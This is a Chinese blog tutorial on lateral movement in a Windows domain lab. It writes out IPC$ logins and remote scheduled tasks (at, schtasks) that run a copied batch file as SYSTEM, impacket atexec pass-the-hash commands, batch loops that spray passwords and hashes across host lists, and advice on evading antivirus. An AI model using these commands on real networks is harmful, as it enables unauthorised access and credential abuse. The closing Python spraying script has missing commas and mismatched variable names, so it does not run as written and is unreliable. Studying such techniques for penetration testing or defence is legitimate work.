域横向批量 at&schtasks&impacket

权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。

1.横向渗透—明文传递at&schtasks

在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机?

这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。

[at] & [schtasks]命令(利用点就是两者都是基于定时任务的攻击):

#at < Windows2012 成立条件
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

#schtasks >=Windows2012  成立条件
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务,对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务

流程概述

获取到某域主机权限 -> minikatz 得到密码(明文,hash)-> 用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典 -> 尝试连接 -> 创建计划任务(at|schtasks) -> 执行文件可为后门或者相关命令。

利用流程:
1. 建立 IPC 链接到目标主机
2. 拷贝要执行的命令脚本到目标主机
3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4. 删除 IPC 链接#建立连接
net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除 IPC
net view xx.xx.xx.xx # 查看对方共享#建立 IPC 常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有防火墙等问题
(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码#建立 IPC 失败的原因
(1)目标系统不是 NT 或以上的操作系统
(2)对方没有打开 IPC$共享
(3)对方未开启 139、445 端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误

推荐:windows内网协议学习

信息收集定位域控主机ip:


创建计划任务:

运行:

之后可以在目标看到添加用户成功。

2.横向渗透—明文/HASH 传递 atexec-impacket工具
Windows提供了许多协议和相关功能,我们可以利用这些功能和协议传递用户的凭证进行验证。该工具有py版和exe版,更推荐py版。

atexec.py ./administrator:Admin12345@192.168.3.21 "whoami"
atexec.py god/administrator:Admin12345@192.168.3.21 "whoami"
atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami" //密码加hash



优点:方便快捷,不光支持明文,还支持hash,还自带提权。。缺点:第三方工具,会受到杀毒软件或防护的影响。如果目标主机有杀软或防护的话,要对该软件进行免杀

Impacket使用指南

3.横向渗透—明文/HASH传递—综合利用演示(弱口令、探针):

mimikatz获取主机密码,储存字典:

ping域内主机,收集为ips.txt文件:

批处理文件跑whoami,同时利用atexec协议工具,目的是查看哪个主机的用户/密码可能与我们收集到的重复:

#批量检测 IP 对应明文连接
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator#批量检测 IP 对应明文 回显版
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami#批量检测明文对应 IP 回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami# 批量检测 HASH 对应 IP 回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami


运气很好,真有一台同密码的个人电脑:

既然是靶机,我们就去看看那台电脑的信息验证一下:

然后拿下这台主机,作为跳板再收集一波字典,信息收集各种协议、凭证信息。之后的思路就是再去探针其他主机,去其他主机再来探寻收集,不断丰富收集到的信息、字典,最终拿下域控:

思路要活:密码、ip、协议、hash、命令、用户等都是可以利用的点,可以手动改变/写脚本批量跑的。有能力就写bat,或c/c++,当然用py写也行,没有py环境,也可以通过导入pyinstaller库将py文件打包成exe文件执行,需要考虑免杀问题,易语言写的总会被杀。

比如此python脚本:


import os,time
ips={'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'1'
}
user = {'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack'
'mary'
'vpnadm'
'webadmin'
passs = {'admin',
'admin!@#45',
'Admin12345'
}
for ip in ips:
for user in users:
for mima in passs:
exec = "net use \\"+"\\"+ip+"\ipc$ "+mina+" /user:god\\"+user
print("----->"+exec+"<-----")
os.system(exec)
time.sleep(1)

内网安全学习(二)---横向渗透相关推荐

  1. 渗透测试(内网)学习第一天

    渗透测试(内网)学习第一天 内网基础知识 主机平台和工具 构建内网环境 1.基础知识 研究内网时首先我们要知道什么是工作组.域.域控制器.父域.子域.域树.域森林.活动目录.DMZ.域内权限等名词 工 ...

  2. 内网安全学习从入门到入狱-知识-内网基础知识

    内网安全学习从入门到入狱-知识-内网基础知识 文章目录 内网安全学习从入门到入狱-知识-内网基础知识 内网渗透基础 基本的名词介绍 工作组 域 活动目录(AD) DC 域控制器(DC) DNS域名服务 ...

  3. Windows内网协议学习Kerberos篇之PAC

    转自:https://www.anquanke.com/post/id/192810 author: daiker@360RedTeam 0x00 前言 这是kerbreos篇的最后一篇文章了.这篇文 ...

  4. Windows内网协议学习LDAP篇之域用户和计算机用户介绍

    0x00 前言 这篇文章主要介绍AD里面的域用户,计算机用户. 0x01 域用户 1. 查询域用户 当我们拥有一个域用户的时候,想要枚举域内的所有用户,主要有两个方法. (1) 通过SAMR 协议查询 ...

  5. 内网安全学习从入门到入狱-知识-内网信息探测与收集

    内网安全学习从入门到入狱-知识-内网信息收集 内网信息收集-工作组和域内基本信息收集 内网安全学习从入门到入狱-知识-内网信息收集 0x01本机检查--先看看我是谁 查询并开启远程连接服务 0x02域 ...

  6. 内网安全学习(六)—域横向-内网漫游: Socks 代理

    内网安全-域横向内网漫游 Socks 代理隧道技术 1.前置知识: 1)正向与反向连接: 正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我 ...

  7. Windows内网协议学习NTLM篇之NTLM基础介绍

    0x00 前言 这个系列文章主要讲ntlm认证相关的内容.以及着重介绍ntlm两大安全问题–PTH和ntlm_relay. ntlm篇分为四篇文章 第1篇文章也是本文,这篇文章主要简单介绍一些基础概念 ...

  8. 一次内网靶场学习记录

    环境搭建 web服务器: 外网IP 192.160.0.100 内网IP 10.10.20.12 域内机器win7 : 内网IP 10.10.20.7 内网IP 10.10.10.7 域内服务器 Ms ...

  9. 内网安全学习(1)---信息收集

    内网安全-域环境&工作组&局域网探针方案 (此内容参考b站小迪师傅的公开课程学习特此记录) 1.一些基本概念知识: 内网拓扑图: 内网内有各种服务.安全设备以及个人电脑,一般DMZ多为 ...

最新文章

  1. Python 初学者常犯的5个错误,布尔型竟是整型的子类
  2. tf.keras.layers.Dropout 示例
  3. html多重边框,中间空白,【基础】CSS实现多重边框的5种方式
  4. MySQL 8.0 技术详解
  5. 设计模式C++实现(3)——适配器模式
  6. hover事件注册实例一枚
  7. Golang sync.Once 简介与用法
  8. “中文直达”能推动移动上网入口洗牌吗?
  9. 毅航产品—模拟载板I
  10. 蒙提霍尔问题(三门问题,概率论)C语言验证
  11. 计算机桌面ico图标,.ico格式图标制作转换教程及DIY桌面图标的方法
  12. 小葵花妈妈课堂之nginx必须要了解的优化九部曲!
  13. MySQL中什么是码_数据库中的码是什么含义?
  14. android开发隐藏图片,用美图看看安卓版教你如何隐藏私人图片(图文)
  15. easyUI 1.3 中文 API
  16. 视频会议检测不到摄像头,电脑打开相关功能提示无法使用-驱动人生解决方案
  17. 娱乐篇~最近挺火的520遍我爱你源码和利用大数计算1~50的阶乘
  18. 蓝桥杯 问题 1094: 字符串的输入输出处理(c++实现)
  19. rapid Scada软件架构
  20. Sensors投稿详细步骤

热门文章

  1. Python字符串格式化输出语法汇总
  2. 为什么局域网网段不同不能通信?
  3. 【教程】FISCO-BCOS一条龙配置go-sdk控制台搭建并启动
  4. 【优化调度】基于NSGA2算法多技能员工调度优化模型含Matlab源码
  5. 力扣简单题-柠檬水找零
  6. 微信授权(前后端分离授权)
  7. C语言学习笔记1——定义输出格式,printf中的“%-xd”
  8. 设计模式 - 学习笔记 - 工厂模式Factory Pattern
  9. 计算机桌面文件隐藏如何显示不出来,如何隐藏文件夹别人都看不到
  10. 秒懂 23 种设计模式!